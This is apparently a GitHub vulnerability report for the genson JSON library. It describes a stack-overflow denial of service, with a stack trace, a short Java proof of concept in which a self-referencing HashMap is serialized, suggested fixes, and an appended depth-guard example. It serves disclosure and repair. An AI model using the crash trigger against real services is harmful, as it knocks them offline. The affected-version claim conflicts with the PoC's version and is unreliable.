owlike/genson

Stack overflow error caused by genson serialization Map

PoppingSnack opened this issue · 0 comments

Description

genson before v1.6 was discovered to contain a stack overflow via the map parameter. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted string.

Error Log

Exception in thread "main" java.lang.StackOverflowError
	at com.owlike.genson.stream.JsonWriter.beginObject(JsonWriter.java:10)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:642)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)
	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)
	at com.owlike.genson.convert.DefaultConverters$UntypedConverterFactory$UntypedConverter.serialize(DefaultConverters.java:1005)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:645)
	at com.owlike.genson.convert.DefaultConverters$MapConverter.serialize(DefaultConverters.java:620)
	at com.owlike.genson.convert.NullConverterFactory$NullConverterWrapper.serialize(NullConverterFactory.java:69)
	at com.owlike.genson.Genson.serialize(Genson.java:274)

PoC

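Maven dependency:

        <dependency>
            <groupId>com.owlike</groupId>
            <artifactId>genson</artifactId>
            <version>1.6</version>
        </dependency>

PoC2.java:

import com.owlike.genson.Genson;

import java.util.HashMap;

public class PoC2 {

    public static void main(String[] args) {
        HashMap<String, Object> map = new HashMap<>();
        // The map holds itself as a value, so the object graph is cyclic.
        map.put("t", map);
        Genson genson = new Genson();
        // MapConverter.serialize recurses into the cycle until the stack overflows.
        genson.serialize(map);
    }
}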

Rectification Solution

  1. Refer to the solution of jackson-databind: Add the depth variable to record the current parsing depth. If the parsing depth exceeds a certain threshold, an exception is thrown. (FasterXML/jackson-databind@fcfc499)

  2. Refer to the GSON solution: Change the recursive processing on deeply nested arrays or JSON objects to stack+iteration processing. (google/gson@2d01d6a20f39881c692977564c1ea591d9f39027)

References

  1. jettison-json/jettison#52
  2. https://github.com/jettison-json/jettison/pull/53/files
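
A sketch of the depth-counter approach from item 1 of the Rectification Solution, run against the same self-referencing map as the PoC. This is an added example, not part of the original issue and not Genson or jackson-databind code; the class name DepthGuardedWriter, the MAX_DEPTH value of 512 and the minimal JSON writer are assumptions made for illustration.

```java
import java.util.HashMap;
import java.util.Map;

// Added illustration, not Genson code; class and constant names are hypothetical.
public class DepthGuardedWriter {
    // Assumed threshold; size it to the deepest legitimate payload.
    static final int MAX_DEPTH = 512;
    static String serialize(Object value) {
        StringBuilder out = new StringBuilder();
        write(value, out, 0);
        return out.toString();
    }

    private static void write(Object value, StringBuilder out, int depth) {
        if (value instanceof Map) {
            // Check before descending so a cyclic or very deep map fails with
            // a catchable exception instead of exhausting the thread stack.
            if (depth >= MAX_DEPTH) {
                throw new IllegalStateException("map nesting exceeds " + MAX_DEPTH);
            }
            out.append('{');
            boolean first = true;
            for (Map.Entry<?, ?> e : ((Map<?, ?>) value).entrySet()) {
                if (!first) out.append(',');
                first = false;
                out.append('"').append(escape(String.valueOf(e.getKey()))).append("\":");
                write(e.getValue(), out, depth + 1);
            }
            out.append('}');
        } else if (value == null || value instanceof Number || value instanceof Boolean) {
            out.append(value);
        } else {
            out.append('"').append(escape(value.toString())).append('"');
        }
    }
    // Minimal escaping (backslash and quote only) to keep the example short.
    private static String escape(String s) {
        return s.replace("\\", "\\\\").replace("\"", "\\\"");
    }
    public static void main(String[] args) {
        Map<String, Object> map = new HashMap<>();
        map.put("t", map); // the self-referencing map from the PoC
        try {
            serialize(map);
        } catch (IllegalStateException ex) {
            System.out.println("rejected: " + ex.getMessage());
        }
    }
}
```

The caller gets an ordinary exception it can catch and log, where the unguarded recursion ends in a StackOverflowError.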